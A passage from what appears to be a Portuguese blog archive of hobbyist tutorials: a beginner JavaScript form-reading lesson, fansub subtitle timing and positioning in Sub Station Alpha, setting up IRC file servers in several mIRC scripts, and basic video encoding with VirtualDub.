também possuem o atributo Name (veremos as linha 7 e 8 logo).

O Atributo Name serve para referênciarmos um elemento HTML dentro do documento, isso quer dizer

que os nomes de elementos devem ser únicos para haver uma referência correta dos campos.

7 <input type=”text” name=”usuario”>

Agora na linha 7 nos temos um elemento input do tipo text, ou seja, para entrada de texto comum.

Os elementos input são definidos pelo tipo (TYPE), vejamos alguns deles:

8 <input type=”password” name=”senha”>

Este elemento acima é um input de tipo “password”, ou seja, o que digitamos nele aparecem no formato

de “*” (asterisco), como é um campo de senha é natural que não queiramos mostrar o valor do campo ao

digitarmos.

9 <input type=”button” value=”login”>

E o último elemento do nosso formulário que é do tipo “button”, os elementos de tipo button são usados

para executar algum evento que determinarmos, em nosso caso ele executará a função

mostraDados()

que ainda iremos construrir no javascript e será executado com o evento onClick (neste tutorial nós não

abordaremos os eventos a fundo).

10 </form>

E a última linha do nosso formulário que fecha a tag form e indica o fim do nosso formulário.

nota: não utilize acentos nos nomes e atributos do elementos

1.2 - Obtendo informações do formulário com javascript

Agora vamos a função javascript que é a parte mais divertida =)

Vejamos o código a seguir, onde juntamos o nosso HTML contendo o formulário e o javascript.

1 <html>

2 <head>

3 <title>PegaDados</title>

4 <script type=”text/javascript”>

5 function mostraDados(){

6 usuario = document.cadastro.usuario.value;

7 senha = document.cadastro.senha.value;

8 msg = “Usuário: ” +usuario+ ” Senha: ” +senha ;

9 alert(msg);

10 }

11 </script>

12 </head>

13 <body>

14 <form name=”cadastro”>

15 <input type=”text” name=”usuario”>

16 <input type=”password” name=”senha”>

17 <input type=”button” value=”login” onclick=”mostraDados()” >

18 </form>

19 </body>

20 </html>

Em nosso novo código temos a função javascript entre as linhas 4 e 11 e na linha 17 temos o evento onclick chamando a função mostraDados().

Vamos começar pela linha 4.

4 <script type=”text/javascript”>

Nesta linha temos a tag <script> e o atributo type, lembra dos atributos ?

A tag script informa que um script será iniciado e o atributo type define o tipo de script que será usado, em nosso caso é do tipo text/javascript que define um script na linguagem de scripts javascript.

5 function mostraDados(){

Na linha 5 temos a chamada à função mostraDados(), as funções javascript possuem a seguinte sintaxe:

função nomeDafunção(){

// bloco de comandos

}

Então temos function que informa o inicio de uma função, mostraDados que é o nome da função e também () os parenteses que podem possuir valores em seu interior (veremos isso mais adiante).

Por fim temos as {} chaves que indicam o inicio e o fim do bloco de comandos que serão executados pela função.

nota: existem diversas funções pré-definidas no javascript e nós não abordaremos isso neste tutorial, portanto leia sobre nomes reservados do javascript e seja criativo e direto na hora de dar nome as suas funções =)

Vamos partir agora apara linha 6 e 7. isso tá ficando legal =)

6 usuario = document.cadastro.usuario.value;

7 senha = document.cadastro.senha.value;

Nas linhas acima temos a palavra usuario e senha que nada mais são que váriaveies que irão armazenar os valores contidos em nossos campos usuario e senha do formulário.

Para se atribuir um valor a uma váriavel temos a seguinte sintaxe:

nomeDaVariavel = “valorDesejado”;

neste exemplo definimos o nome da váriavel e definimos também seu valor que é contido entre aspas duplas, através do operador ‘=’ (igual), no exemplo acima queremos definir um valor cujo o mesmo é uma string (tipo de váriavel texto), ou seja, seu valor é um texto, palvara, frase..

existem diversos tipos de variáveis e operadores, veja em: 1.3 Tipos de variavéis e operadores

E agora vamos ver como isso acontece.

Lembra que demos o nome “cadastro” ao formulário ?

lembrando:

dissemos também que é através dos nomes que temos acesso (referência) ao elementos.

um exemplo bem simples sobre acesso as propriedades de um elemento ou objeto:

Vamos usar como ex. a váriavel gato, e vamos supor que queiramos acessar a propriedade pata do gato.

então seria algo assim:

gato.pata;

e se quissemos acessar a propriedade dedo do gato seria assim:

gato.pata.dedo;

agora a unha do gato (eu disse que isso era divertido). =)

gato.pata.dedo.unha;

Claro que a coisa pode não ser tão simples assim em outros casos, pense no seguinte:

e se você quisesse acessar a unha do dedão da pata do gato?

isso varia de acordo com a complexibilidade do programa, e o nosso não é nada complexo =)

Mas vamos deixar o coitado do gato em paz e vamos voltar ao nosso formulário.

Então se temos um formulário chamado “cadastro” e um campo chamado “usuario” para “recuperarmos”

o valor deste campos devemos proceder da seguinte maneira:

cadastro.usuario;

Só que o que queremos na verdade são os valores que foram digitados neste campo e para isso temos a propriedade “value” (valor) para cada elemento filho.

Em nosso caso o elemento Pai é o formulário e o elemento filho é o campo usuario e também os demais campos.

cadastro.usuario.value;

Mas o formulário ainda não é o elemento Pai de todo o documento e por isso usamos o “document” seguido do nome do elemento ou objeto que queremos acessar, então finalmente temos:

document.cadastro.usuario.value;

A linha acima faz então a referência ao valor do campo usuario contido no formulário cadastro, porém temos que criar uma váriavel para armazenar este valor e é claro diminuir o caminho de acesso à este valor.

Então vamos criar a variável usuário e atribuir à ela o valor contido em document.cadastro.usuario.value;

vejamos abaixo como ficaria:

6 usuario = document.cadastro.usuario.value;

Pronto, temos agora o valor do campo usuario na variavel usuario, claro que você pode dar outro nome à esta váriavel.

Agora é só fazer a mesma ação para os demais campos, vamos ver então o campo senha como seria;

Vamos criar a váriavel senha e atribuir a ela o valor contido…onde?

isso mesmo, em document.cadastro.senha.value;

Vamos lá !

6 usuario = document.cadastro.usuario.value;

7 senha = document.cadastro.senha.value;

É isso, agora temos nas váriaveis usuario e senha os respectivos valores contidos nos campos do formulário, claro que estamos supondo que o usário digitou estes valores, vamos ver como descubrir se o usuário digitou ou não nos campos com a função validaDados() mais adiante em 1.4 - Validando o formulário com funções javascript.

Agora que você já compreendeu as linhas 6 e 7, vamos ver novamente nosso código completo para podermos então prosseguir com a linha 8.

Abaixo nosso código completo:

TUTORIAL DE TIMING E POSICIONAMENTO DE LEGENDAS - BY [UAT]

2008-05-27T11:58:00.001-07:00

TUTORIAL DE TIMING E POSICIONAMENTO DE LEGENDAS - BY [UAT]

Timing eh simplesmente por tempo nas legenda
posiconamento de legenda o nome ja diz o q eh =-=''

Faremos timing atraves do sub station alpha, um programa q vc aplica os tempos nas legendas
atraves do audio do video, portanto nosso primeiro passo sera aprender como extrair o audio de um video.

1- abra a raw no virtual dub
2- clicque em audio, depois em full processing mode
3- clique em audio de nvo e va em conversion
3- seleciona as seguintes opcoes: 44100hz, mono, 8bit (o sub station alpha non reconhece as bagaca me stereo ~~), depois de ok em tdo.
4- va em File, depois em ''save wav as...'' e espera o virtual dub extrair o audio ;D

Feito isso, agora vc vai precisar da traducao, pessa ao tradutor q traduza no bloco de notas pondo
uma fala em baixo da outra, mais quando aparecer akeleas falas de 2 linha pesa pra ele por tdo em uma linha soh
pq no video vai fikar com duas linha automtico ~~.

1- Abra o sub station alpha
2- va em timing, depois em timing form wav file
3- agora o programa mudou um poko, ele tem um nvo painel, nesse nvo painel tem um botao de opne
clique nele e abra o .wav do video ai.
4- agora vc ta vendo uma linha sonora ae ~~ e em cima dela tem akele painel, nesse painel tem duas barrinhas
pequenas uma delas eh de zoom, ajusta o zoom pra sua preferencia, eu uso x64, quando mairo o zoom mais devagar vai rolar a linha
quando menor mais rapido vai ~~
5- agora c vc clicar com o batao direito do mause nessa linha sonora, vai aparecer uma linha vermelha
essa linha significa o tempo final da frase q vc quer, e se clicar com o botao esquerdo vaia aparecer uma linha
amarela q siginiga o tempo inicial.
6- clique em play nakela painel e quando a aprecer a fala q seja o tempo certo da legenda vc poem a linha
amarela no inicio e a vermelha no final. nunca ponha muito em cima da fala nem muito antes sempre de uma distancia pekena
e semrpe ponha a fala com um tempo em q vc consiga ler ela. e sempre deixe um espaco de no minimo 2 decimo entre uma fala e outra
se nao elas vao se econtrar no video e isso non eh legal, isso eh feio ~~.
7- apos ter selecionado o tempo da fala clique em grab time,e pronto a sua fala ja esta com o tempo certo :)
8- para salvar clique em F2 ~~

Pronto agora vc eh um cara feliz e que sabe fazer timing :D. Agora vamo aprender a por
legenda em qualquer canto da tela :D?
Existe vairas maneiras de fazer isso, use a que vc achar melhor

primeira maneira -> {\pos(x,y)}

1-antes da frase q vc quer alinhar no video escreva {\pos(x,y)} o x representa a posicao
q ela assumira no eixo x e o y a posicao q assumira no eixo y. Exemplo:

{\pos(200,300)}vai toma no cu seu filho da puta!

segunda maneira -> {\an}

antes da fala utilize o {\an} o n siginigica o algo q eu non sei. tipow:

{\a6}seu merda!! <<< o seu merda vai fikar em cima da tela
{\a3}seu merda!! <<< o seu merda vai fikar no canto superior esquerod da tela eu acho eu nunca sei ~~
vai tentando uns numero ae q vc descobre mais posicoes com \a :D

Terceira maneira -> a mais facil

1- clique em style no sub station alpha
2- clique em define
3- agora nessa tela ae vc na um new e faz o style q vc quer ~~
4- depoisde clicar em new, vc escolhe a fonte q vc quer escolhe as cores e tdas as badalhoca
dae vai tem umas paradinha ai ema baixo da parte q vc escolhe a fonte e q vc escolhe o posicionamento da linha ~~
5- tem la: toptitle, subtile, midtilte, center, left, right, dae se escolhe onde quer q ela fike ~~
6- tem uns bagulho de vertical, right e left com uns numeros do lado, vai alterando eles e vc vai acertando
a posicao da legenda.

Pronto agora vc eh um cara mais do q feliz, vc sabe timing e por posicionamento de legenda :d
agora vc pode fazer um monte de coisa legal, apesar desse tutorial ser uma merda devido a minha
fraquesa com portuges acho q da pra ter uma noção.

Tutor Owner Para Iniciantes e Intermediarios

2008-05-27T11:45:00.000-07:00

Tutorial Fserver By Soujiro_Seta

2008-05-27T11:20:00.000-07:00

Aew galera, acabou a desculpa de que não sei fazer um fserver. Esse tutorial irá ensinar você a montar seu próprio fserver, passo a passo.
Para quem não sabe ainda o que é um fserver, leia o tutorial anterior XD, pois este destina-se diretamente a criação, e não a explicação.

Antes de partir para o tutorial propriamente dita, alguns tópicos pressisam ser passados:

- Assim como fiz no tutorial básico, colocarei uns comentários, um tanto que pessoais e cômicas. Caso você se ofenda, peço desculpas, mas esse tutorial não foi feito para ser tecnico, mas sim interativo ^^ ;
- As opções entre /ctcp ou normal fica a seu critério. Existem canais que soh aplica voice (+) aos fservers /ctcp, outros canais não ligam pra isso, contanto que o seu fserver esteje funcionando :P
- Particularmente, eu uso o modo normal. Se o canal só aceita /ctcp, como que fica, eles só aceitam pessoas com esse tipo de fserver?? Claro que não. Sinceramente, acho muito errado discriminarem fservers, pois VOCÊ, leitor, já está tendo paciência em me aturar e, ainda está tendo muito mais paciência em compartilhar. Merecemos mais respeito. A diferença (pelo que sei) é no comando, onde no /ctcp o trigger possui /ctcp, enquanto no normal não, podendo ser qualquer comando. (obs.: se você for usar o modo normal, utilize comandos que comecem com !,por exemplo, !musicas. Colocar de qualquer forma o comando trigger é um desrespeito ao canal);
- Muitos canais proibem a propaganda temporária. Este tutorial procurará fazer seu fserver ser anunciado com o comando !list.
- Ao final de cada explicação, terá uma avaliação pessoal sobre o fserver do script. Nessa avaliação, pesa principalmente a dificuldade de criação e a operãçao do fserver. No critério Complexidade, quanto menor a nota melhor;
- OBS MUITO IMPORTANTE: Se você souber outro modo de fazer um fserver com outros scripts (ou sobre esses mesmos aqui ensinados), ou tenha alguma explicação que esteje errada, procure-me e, me ensine. Gente, sou humano também. Sou falho, pobre e louco como todo mundo XD. Além disso: esse tutorial foi feito com amor por um cara da área de exatas. Concordâncias e etc e tal estão fora de cogitação. Caso você queira me fazer o favor de corrigir, fique a vontade. Só não quero que este fserver se destorsa. Para ser sincero: Matematica rules :P.

- ÍNDICE
- SYSRESET
- CYBERSCRIPT
- SCOOP
- THE SEVEN DEADLY SINS ( CONHECIDO COMO T7DS )
- UPP

Pelo fato de serem os scripts mais usados e conhecidos, estarei ensinando cada um, detalhadamente. Para os outros scripts, de início, necessitarei do setup.exe, para depois começar o "how to".

- Sysreset
versão utilizada: 2.53

- Prós: é um dos fservers mais fáceis de sse configurar, sem muitos detalhes.

- Contra: tudo em inglês :-(, dessa forma,, cabe a VOCÊ entender o que estou fazendo aqui XD, brincadeira. Ter uma noção básica em inglês ajudará. Além disso, por ser muito simples, falta algumas configurações para deixar o fserver mais interativo e divertido.

- Fserver: primeiro, vá em Sysreset => Fille Server Manager;
Na janela que abriu, vá na orelha File Server Triggers;
Deixe a opção "Enabled" ativada (por motivos óbvios, sem isso o fserver não liga :P);
Como já foi dito, /ctcp ou não fica ao seu critério: se sim, deixe ativado; se não desative (óbvio XD);
Deixe no "Access Mode" na opção "No Restrictions" (isso é um fserver público, não o Clube do Bolinha, onde poucos e privilegiados tem acesso. Se você quiser mudar essa opção, isso torna-se particular seu);
Deixe a opção "Respond to !List" ativado, isso será útil no futuro;
Clique em "Add";
Selecione um comando como trigger (isso fica a seu gosto, mas lembre-se, se for modo normal, coloque um ! no comando);
Nessa outra janela, está perguntando se você deseja inserir algum texto em forma de arquivo .txt como sendo uma mensagem de boas vindas. Eu particularmente não uso, mas isso fica a seu gosto. Se tiver algum arquivo .txt que você queira usar, indique-o, se não, basta clicar em cancelar;
Nessa nova janela, indique a pasta que você quer compartilhar com as pessoas. Todos os arquivos contidos nessa pasta serão compartilhados.
Após esses passos, vá na orelha "Server Config";
Essas configurações são ao gosto pessoal. Irei indicar uma configuração básica ótima para fservers;
Em "Max Sends" deixe assim: Each = 1 e Total = 2;
Em "Max Queues" deixe sem limite (essa opção limita o número máximo de pedidos para uma fila, eu prefiro deixar sem limite)
As outras coisas não possuem tanto significado para ficar detalhando. Vá em "Basic Options" e mude para "Advanced Options";
Nessa sessão, fica mais ao gosto seu se quer mostrar informações (as vezes fúteis, as vezes interessantes). Pessoalmente, eu gosto de mostrar. Quem não quiser ver, feche os olhos XP. Se você tem gostado dos meus gostos pessoais, e tem seguido, nessa parte, todas as opções do lado direito deixe ativadas. Se não, faça do seu gosto XD, você é livre para tomar suas próprias decisões XD. Desculpe a minha preguiça, mas tenho outros scripts para explicar, e ficar explicando coisa por coisa consome tempo (que por sinal não tenho :P);
Após a configuração acima, clique em "Done";
Está quase terminando, falta apenas 1 detalhe: a propaganda;
Vá em Sysreset => Servers Active => Silent with !List;
Pronto, agora desfrute o seu fserver nos canais. Caso você queira restringir a alguns canais, vé em Sysreset => File Server Manager;
Vá na orelha File Server Triggers, clique no trigger correspondente ao fserver que você quer restringir a algum canal;
Desative a opção "All Channels", e no campo acima digite os canais no qual você quer que o fserver opere. No final, clique em "Done" e seu fserver estará restrito a apenas aquele(s) canal(is).

Nota para esse fserver: 8,7
Complexidade: 5,0

- CYBERSCRIPT
versão utilizada: 3.0

- Prós: possui dificuldade razoável. O scrript encontra-se em português, facilitando NOSSAS vidas (isso significa menos explicações XD - brincadeira ^^).

- Contras: o Cyber abre uma outra janela, ou seja, para ter um fserver ativo é preciso ter um clone.

- Fserver: Vá em Opções/Comandos => Utilittários => Fserver;
Na nova janela, aperte F1, ou vá em Opções/Comandos => Configuração;
Deixe a opção Fserver ligado;
Novamente pergunta-se o comando (via canal ou ctcp - deixo por sua conta :P);
Após decidir o comando, clique no botão ao lado de "Pasta dos Arquivos", e selecione a pasta a ser compartilhada;
Na parte de descrição, seje gentil com quem procura, coloque o tipo de arquivo que você está compartilhando. Isso facilita buscas (mesmo existindo o comando @find, mas isso é detalhe XD);
Se você exige uma leitura de regras e coisa e tal, ative a opção, e clique no botão ! para criar suas regras. Isso vale para o "Exibir aviso de entrada";
Deixe ativado os dois últimos botões (Logar envios e recebimentos, e Ativar @find/@locator);
Na parte de créditos, deixe livre. Isso é um fserver público, não celular de cartão XD;
Na orelha Limites, o padrão estabelecido está de um bom tamanho. Mude essas configurações conforme sua necessidade;
Na orelha Propagandas, desabilite "Utilizar propaganda nos canais". Ative "Responder a !list em canal". Caso você queira diminuir os lags, deixe um intervalo entre avisos por volta de 1 min (60 segundos pra quem não sabe :P). Caso você não ligue, deixe com um intervalo de tempo menor;
Na parte de canais, diga se você quer compartilhar em todos os canais em que estiver presente, ou somente para alguns canais;
Após tudo isso, clique em Fechar, e conecte o seu "bot";
Prontinho, um novo fserver acabou de nascer, e parece com a cara do pai/mãe XD.

Nota para esse fserver: 8,0
Complexidade: 4,0

- Scoop
versão utilizada: 2004

- Prós: O script encontra-se em português,, facilitando a vida dos brasileiros ^^.

- Contras: Assim como o CyberScript, o Scooop abre uma janela a parte; Até hoje não encontrei onde desativa a propaganda em canal e ativa somente a do comando !list. Caso exista e você saiba onde fica, me ensine ^^, afinal, sou humano também ^^.

- Fserver: vá em Scoop Script => File Servver => Abrir o Fserver;
Na nova janela, vá em Scoop Script => Configuração;
Deixe a opção "File server ligado" ativado;
No "Tipo de servidor", prefira o modo de Acesso Livre;
Na parte de limites, estabeleça os que melhores lhe convém. Esse padrão aparenta uma boa configuração;
Na "Palavra Chave", coloque a palavra que será utilizado como trigger;
Em "Pasta dos arquivos", clique no botão abaixo e indique a pasta a ser compartilhada;
Na parte "Servindo", fica a seu critério se coloca algo explicando o conteúdo da pasta;
Se você exige a leitura das regras, ou aviso do fserver, ative as opções e clique no botão ao lado para editar sua mensagem;
Após tudo isso, clique em Configurar Propagandas;
Como até hoje não achei somente a propaganda por !list, cabe a você decidir como quer a propaganda. Eu recomendo procurar um OP do canal que você irá distribuir, para perguntar se eles autorizam a sua propaganda, e de que forma. Pergunte o tempo de intervalo. O problema maior é que a maioria dos canais por onde passei, não aceitam propagandas desse tipo. Ou seja, esse estilo de fserver não é recomendável, pois é passível de punições;
Assim que você decidir a forma de propaganda, clique em ok e comece a disfrutar seu fserver.

Nota para esse fserver: 5,0
Complexidade: 5,0

- THE SEVEN DEADLY SINS
versão utilizada: 9.4

- Prós: script muito bom para conversaçõess, tendo uma aparência limpa, facilitando as leituras. O script pode ser encontrado em português.

- Contras: não é muito bom para fservers ((sempre tive problemas pra configurar no T7DS). Não sei onde fica (ou se existe) o botão !list. Bom, pelo menos até agora não encontrei.

- Fserver: vá em Comandos/Opções => Configgurações => Opções do Fserver;
Deixe a opção "Fserver ligado" ativado;
Na parte de pasta, clique no botão !, e escolha a pasta a ser compartilhada;
Na parte do tipo de IP, deixe no modo normal. A outra opção faz com que você se conecte no usuário, e não o contrário (que por sinal é o que acontece em todos os outros fservers ensinados aqui);
No comando de ativamento, bem, isso é contigo. Me deixe orgulhoso Bill XP;
O T7DS não trabalha com o comando @locator. Para isso ative-o, e indique a pasta em que ele irá funcionar (é claro que esta pasta deve estar disponível no fserver);
Após tudo isso, vá em Opções, e configure os totais de envios e recebimentos compatíveis com a sua banda;
Aqui encontramos um problema do T7DS: ele somente anuncia o fserve com propagandas, ou seja, da mesma forma que o Scoop, esse tipo de propaganda normalmente não é permitido. Consulte um OP antes de ativar o seu fserver, para ver se você não será punido pelo seu "spam" XP;
Como não tem como desativar a parte de créditos iniciais, deixe um crédito beeeem generoso;
Assim que tudo estiver pronto, ative seu fserver com o botão OK. Eis um novo fserver na rede \o/.
Uma configuração que fica a parte: toda vez que alguem entrar no seu fserver vai aparecer uma janela avisando sobre o requerimento de conexao. Uma coisa interessante a se fazer é, quando essa janela aparecer, desativar o botão que diz "Sempre mostrar esse aviso". Isso por 2 motivos: 1 = enche o saco ficar fechando toda vez quem alguem acessar o seu fserver; 2 = as vezes você sai e deixa o PC ligado compartilhando os seus arquivos (como todo bom samaritano). Como você não está no computador para autorizar o acesso, o outro user vai ficar "chupando o dedo", esperando acessar o seu fserver. Seje uma boa pessoa e desative essa janela. Os users agradecem ^^.

Nota para esse fserver: 5,0
Complexidade: 5,0

- UPP
versão utilizada: 2.0

- Prós: script com alto poder de fogo. Muiito bom, com bastante opções.

- Contras: muito complexo, dificultando a criação do fserver. Script somente em inglês.

- Fserver: vá em UPP => Control Painel;
Nessa nova janela, verifique se a opção fileserver encontra-se presente. Caso não, vá em modules, e procure a opção fileserver e ative. Dessa forma, na janela anterior estará presente a opção de configuração do fserver;
Na orelha "general", deixe a opção "enable fserver on start" ativada;
Vá para a orelha "shared", clique em add. Nessa nova janela, clique em browse e escolha a pasta que você quer compartilhar. Após isso, na opção abaixo, coloque um nome genérico para uma pasta. Explicação: O UPP guarda todos os fservers em uma pasta virtual chamada /. Para diferenciar um fserver de outro, cada fserver deve possuir uma pasta virtual dentro do diretório virtual /;
Logo após isso, clique nos botões update cache, changed mount preference;
Após isso, vá na orelha triggers, clique em add. Elabore seu comando e escolha opção normal ou ctcp;
Escolha os canais no qual esse fserver irá participar;
Na parte de "required channel access level" deixe any, se o seu fserver for de uso público, ou escolha o nível que a pessoa deve ser para acessar;
Deixe a opção "apply to !list reply" ativado;
Se você quiser mostrar uma mensagem de boas vindas ou regras, ative a opção "enable" na área de "welcome text";
Clique em "select" da sessão "queue pool" e escolha uma opção onde na coluna "used by" esteje uma opção fsever;
Na orelha "services", ative a opção "enable" da sessão "@find system"
Na orelha "fserve ad", na sessão "options", marque as opções que você quer mostrar quando alguem digitar !list (entre essas opções estão: record de download, arquivo mais requisitado, entre outras coisas fúteis, mas legais ^^);
Após tudo isso, clique novamente em "update cache", depois em Ok;
Vá em UPP => serving => fserver => force silent. Dessa forma, o seu fserver funcionará apenas com o comando !list;
Pronto. Mais um fserver pronto a servir ^^.

Nota para esse fserver: 9,0
Complexidade: 8,0

Tutorial elaborado por Soujiro_seta

Tutorial de Karaokê

2008-05-27T10:13:00.000-07:00

Tutorial Básico de Encoder

2008-05-20T07:53:00.000-07:00

Bom, lá se vai eu de novo fazendo mais um tutorial. Estou começando a gostar de fazer esses tutoriais. Espero que aprendam com minhas explicações. Nesse tutorial vamos aprender a ser um encoder de nível básico, o que não significa que não teremos bons encoders, pelo contrário, com esse tutorial seus encoders sairão um tanto que divinos... hehehe (Só pra me exaltar um pokinho^^! zuera).

Primeiro vamos entender o que um encoder faz. O encoder é o membro de um fansub que junta o vídeo, o áudio e a legenda tanto das falas quanto de karaokê e créditos em um único vídeo. É uma função um tanto que básica, mas muito demorada. Vamos deixar de lero-lero e começar a trabalhar.

Vamos começar com o que se precisa para poder encodar:

· Um bom computador que esteja sempre em atualização. No caso de o Sistema Operacional ser o Windows, sempre execute o Windows Update

· Codecs de áudio e vídeo sempre atualizados

· Ter instalado na máquina os programas Virtual Dub e Virtual Dub Mod (nesse tutorial abordaremos apenas esses dois programas)

· Um bom conversor de áudio (Eu particurlamente uso um que veio no próprio programa de gravação de CD: o Roxio Sound Editor. Mas existem boas opções como o conversor de áudio do Nero e até com o próprio Winamp.)

· Ter instalados também os plugins de Virtual Dub

Bom, vamos começar imaginando a seguinte situação:

-Quero traduzir um anime e encontrei ele no formato .mkv ou .ogm em um fansub americano.

Certo, você pode traduzir sim esse anime, por que os formatos .ogm e .mkv podem ser desmembrados, ou seja, posso obter uma separação “quase” perfeita do áudio, do vídeo e das legendas. Para entender melhor vamos entender um arquivo .avi. Um arquivo .avi é um vídeo codificado, ou seja, você não tem acesso a modifica-lo como se pode modificar um arquivo .ogm e .mkv. Quando se encoda um .avi, a legenda fica “fixa” no vídeo, como se ela fosse parte do vídeo. Já nos formatos .ogm e .mkv não, a legenda não é “parte” do vídeo e sim “opção” do vídeo.

-Mas como posso separar o vídeo do áudio e da legenda em um arquivo no formato .ogm ou .mkv?

Isso será o que abordaremos nessa primeira parte do tutorial. Nessa primeira parte, iremos apenas trabalhar com o Virtual Dub Mod, que é o programa que mexe especialmente com arquivos .ogm e .mkv.

Fuçando o Virtual Dub Mod

Vou começar essa parte do tutorial partindo da idéia de que você obteu os programas de meu Disco Virtual. Logo após baixar o Virtual Dub Mod, dezipe-o em uma pasta qualquer e execute-o.

OBS: Você obrigatoriamente terá, apartir de agora, de possuir em sua máquina os codecs de .ogm e .mkv.

Após executar o programa e talz, dê uma olhada na interface do programa. Ele não é um programa bem bonito, mas é muito eficiente. A interface desse programa é bem semelhante a do Virtual Dub, partindo da idéia de que o Virtual Dub Mod é uma “modificação” do Virtual Dub, que é um programa open source.

Bom continuando o exemplo acima, vamos partir da idéia de que você baixou o anime em formato que você estava procurando e ele estava em .ogm ou .mkv, tanto faz. Nessa parte vamos supor que o anime estava em .ogm, o que não importa muito, sabendo que os procedimentos para se operar um arquivo .ogm são os mesmos de um arquivo .mkv.

Clique em File, depois Open Video File e vá na pasta em que se encontra o anime no formato .ogm a ser subbado. O vídeo será carregado e logo após habilitará muitas opções. Bom, vamos começar a “desmembrar” o vídeo. Quero que entendam que desmembrar o vídeo não significa separar o vídeo do áudio e das legendas definitivamente. Posso dizer que na verdade vamos copiar o vídeo ou o áudio do vídeo no formato .ogm. Quando retirarmos o vídeo do arquivo .ogm, na verdade estamos apenas copiando aquele vídeo para ficar separado do áudio e das legendas. A mesma coisa vale pro áudio e para as legendas. Iremos entender melhor quando praticarmos.

Agora vamos primeiro tirar o vídeo “raw”. Denominamos Raw o vídeo em que não possui nenhuma alteração de imagem ou som ou que esteja rente ao original. Vou aplicar a denominação de vídeo raw, mas lembro que não é o termo apropriado, lembrando que os arquivos .ogm e .mkv foram modificados ou acrescentando áudio ou acrescentando legendas. Geralmente o vídeo não é muito modificado, por isso podemos chamá-lo de Raw.

Clique em File, depois clique em Save as... Coloque um nome para o arquivo onde tiver Nome do Arquivo: como por exemplo Video_raw ou Nome_do_Anime_video_raw. Esse nome vai ser apenas uma distinção para na hora em que formos encodar sabermos qual é o vídeo “raw”. Em Salvar como deixa a opção Áudio-Video Interleave (*.avi). Agora lá em baixo, na parte delimitada chamada Vídeo, mude a opção do Vídeo Mode de Full Processing Mode para Direct Stream Copy. Bom, agora é só escolher a pasta onde se quer salvar e clicar em Salvar. Primeira etapa concluída.

Vamos agora copiar o áudio. O áudio que vem em arquivos .ogm e .mkv estaram no formato .ogg, por isso haverá necessidade de um bom conversor de áudio. Se você não tiver um, tente no site www.superdownloads.com.br . Se não conseguir um bom conversor tente baixar o Nero só mesmo para converter esse bendito áudio.

Clique em Streams e depois em Stream List. Vai listar alguns arquivos em uma janela. Esses arquivos são os áudios e as legendas que são carregadas quando se executa o arquivo .ogm em um Vídeo Player como o BSPlayer. Agora resta saber identificar quem é áudio e quem é legenda. Como um arquivo .ogm ou .mkv são denominados dual audio, é que significa que eles vem com 2 sons. Com certeza um esta em japonês e outro está em outra língua. O que sobra geralmente é legenda. Eu disse geralmente. Vamos identificar qual dos áudios está em japonês, que é a língua que nos interessa.

Nessa mesma janela haverá 10 opções. Clique em um arquivo da lista e depois clique em Comments. Irá abrir uma pequena janela com os comentários do arquivo. Depois disso será fácil identificar o que é áudio e o que é legenda. Depois de saber quais arquivos são legendas e áudios, clique no arquivo que deseja, que no caso é o áudio em japonês, e depois clique em Demux. Dê um nome para identificar o áudio .ogg que acabamos de retirar e pronto, clique em Salvar.

A mesma coisa vale para a legenda. Depois de identificar qual é a legenda que se quer traduzir, clique em Demux, dê um nome ao arquivo e clique em Salvar.

Bom, agora que fizemos tudo com o Virtual Dub Mod o que resta agora é converter o áudio .ogg para .wav. Abra o áudio .ogg em seu conversor, e converta para um áudio .wav das seguintes características: áudio .wav 48000 KHz Stereo 16 bits. O áudio .wav ficará em torno de 255 Mb, dependendo do tempo de duração do anime.

Etapa Intermediaria

Essa etapa é a etapa em que o resto do fansub trabalha, ou seja, depois de retirarmos as legendas e o áudio, o encoder necessariamente auxiliará o que for preciso nos types e karaokês. Ou mesmo com os tradutores. Nessa parte, se um karaokê maker precisar da abertura e do encerramento, o encoder terá que dar conta de providenciar tudo para que se obtenha o maximo de proveito de um karaokê. Só para lembrar que o áudio geralmente usado por um karaokê maker é das seguintes configurações: áudio .wav 8 KHz 8 bits mono. Bom, isso aqui pode ser explicado mais tarde. Vamos ao que interessa!!!

Preparando o Encode

Chegou a parte mais esperada \o/. Bom, essa etapa vai ser um pouco mais trabalhosa que a etapa passada com o Virtual

Dub Mod.

Depois de pegar o Virtual Dub e dezipa-lo, execute e veja como ele é bem semelhante ao Virtual Dub Mod. Apenas algumas

opções são modificadas com o Streams que virou Áudio agora. Há outras mudanças, mas não vem ao caso.

OBS: AGORA, MAIS QUE OBRIGATORIAMENTE VOCE TERA DE TER TODOS OS CODECS ATUALIZADOS,

ESPECIALMENTE OS CODECS DO XVID E O DO MP3.

OBS2: Certifique-se de que você pegou do meu Disco Virtual uma pasta zipada chamada plugins_VD. Feche o Virtual Dub, pegue a pasta zipada de meu Disco Virtual e dezipe tudo na pasta plugins do diretório do Virtual Dub. Certifique-se também de ter instalado o VobSub, que também se encontra em meu Disco Virtual.

Vamos usar nesse tutorial o codec XVID para encodar, principalmente por que ele é o mais utilizado hoje em dia. Já para

áudio vamos usar o codec MP3.

Abriremos o vídeo clicando em File e depois em Open Vídeo File... Depois iremos na pasta do vídeo, selecionaremos o vídeo raw e clicaremos em Abrir. O vídeo já está aberto, agora vamos carregar o áudio. Clique em Audio e depois em WAV Audio... Procure o áudio .wav que convertemos anteriormente e pronto, video e áudio estão carregados.

Vamos carregar legendas e outras parafernálias como o type do episódio e o karaokê também agora. Clique em Vídeo, depois em Filters... Vai aparecer uma janela com 8 opções. Clique em Add... e na lista que aparecer procure por TextSub 2.23 dê um duplo clique nessa opção ou então selecione-a e clique em OK. Apareça novamente uma janela e nela irá ter apenas umas caixas de seleção, que não serão muito utilizadas e duas opções que são Open e Cancel. Obviamente não clicaremos em Cancel, então nos resta clicar em Open. Após clicar em Open, apareça uma nova janela para escolher a legenda a ser carregada. Escolha a legenda, clique em Abrir, clique em OK e pronto, a legenda está carregada. Para carregar outra legenda é a mesma coisa, o mesmo procedimento: Add... > TextSub 2.23 > Open > Escolher Legenda > Abrir > OK. Carregue todas as legendas a serem utilizadas no episódio e dê um OK na janela Filters.

OBS: Tente carregar as legendas no tempo de aparição delas, para que fique mais organizado. Exemplo: 1º

Legenda do Karaokê da Opening 2º - Legenda dos créditos do staff do episódio 3º - Legenda do episódio 4º - Legenda do Karaokê da ending.

Configurando os CODECs

Vamos agora configurar os codecs a serem instalados. Primeiro vamos configurar o codec de áudio.

O codec de áudio a ser utilizado será o codec MP3. Mas há um problema: Existem muitos codecs MP3 na internet. Qual o melhor? Eu particurlamente acho que o codec LameMP3 é o melhor a ser utilizado, e por isso vou explicar como configurar a partir do LameMP3.

